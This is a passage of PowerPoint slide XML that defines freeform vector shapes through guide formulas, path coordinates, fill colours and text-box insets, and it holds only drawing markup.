          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10400" name="Freeform 481"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1736725" y="6226175"/>
            <a:ext cx="28575" cy="115888"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 51"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 51"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 51"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 51"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 51"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 51"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 51"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 51"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 51"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 51"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 51"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 51"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 51"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 51"/>
              <a:gd name="T28" fmla="*/ 0 w 12"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 51"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 51"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 51"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T35" fmla="*/ 0 h 51"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 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51"/>
              <a:gd name="T59" fmla="*/ 12 w 12"/>
              <a:gd name="T60" fmla="*/ 51 h 5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51">
                <a:moveTo>
                  <a:pt x="12" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="A5EDFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10401" name="Freeform 482"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1739900" y="6242050"/>
            <a:ext cx="20637" cy="84138"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T1" fmla="*/ 0 h 37"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T3" fmla="*/ 0 h 37"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 37"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 37"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 37"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 37"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 37"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 37"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 37"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 37"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 37"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 37"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 37"/>
              <a:gd name="T26" fmla="*/ 0 w 9"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 37"/>
              <a:gd name="T28" fmla="*/ 0 w 9"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 37"/>
              <a:gd name="T30" fmla="*/ 0 w 9"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 37"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 37"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T35" fmla="*/ 0 h 37"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T37" fmla="*/ 0 h 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37"/>
              <a:gd name="T59" fmla="*/ 9 w 9"/>
              <a:gd name="T60" fmla="*/ 37 h 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37">
                <a:moveTo>
                  <a:pt x="9" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10402" name="Rectangle 483"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1462087" y="6219825"/>
            <a:ext cx="9525" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:no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403" name="Freeform 484"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1557337" y="6215063"/>
            <a:ext cx="103188" cy="123825"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T8" fmla="*/ 0 w 46"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T10" fmla="*/ 0 w 46"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T12" fmla="*/ 0 w 46"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T14" fmla="*/ 0 w 46"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T78" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T79" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T80" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T81" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T82" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T83" fmla="*/ 0 h 55"/>
              <a:gd name="T84" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T85" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T86" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T87" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T88" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T89" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T90" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T91" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T92" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T93" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T94" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T95" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T96" fmla="*/ 2147483647 w 46"/>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6"/>
              <a:gd name="T148" fmla="*/ 0 h 55"/>
              <a:gd name="T149" fmla="*/ 46 w 46"/>
              <a:gd name="T150" fmla="*/ 55 h 5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6" h="55">
                <a:moveTo>
                  <a:pt x="4" y="6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="6"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="999999"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10404" name="Freeform 485"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1412875" y="6307138"/>
            <a:ext cx="82550" cy="23812"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 37"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T2" fmla="*/ 0 w 37"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T4" fmla="*/ 0 w 37"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T21" fmla="*/ 0 h 10"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T23" fmla="*/ 0 h 10"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T25" fmla="*/ 0 h 10"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T27" fmla="*/ 0 h 10"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T66" fmla="*/ 0 w 37"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T68" fmla="*/ 0 w 37"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 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0"/>
              <a:gd name="T107" fmla="*/ 37 w 37"/>
              <a:gd name="T108" fmla="*/ 10 h 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0">
                <a:moveTo>
                  <a:pt x="0" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10405" name="Freeform 486"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1412875" y="6251575"/>
            <a:ext cx="82550" cy="23813"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 37"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T2" fmla="*/ 0 w 37"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T4" fmla="*/ 0 w 37"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 11"/>
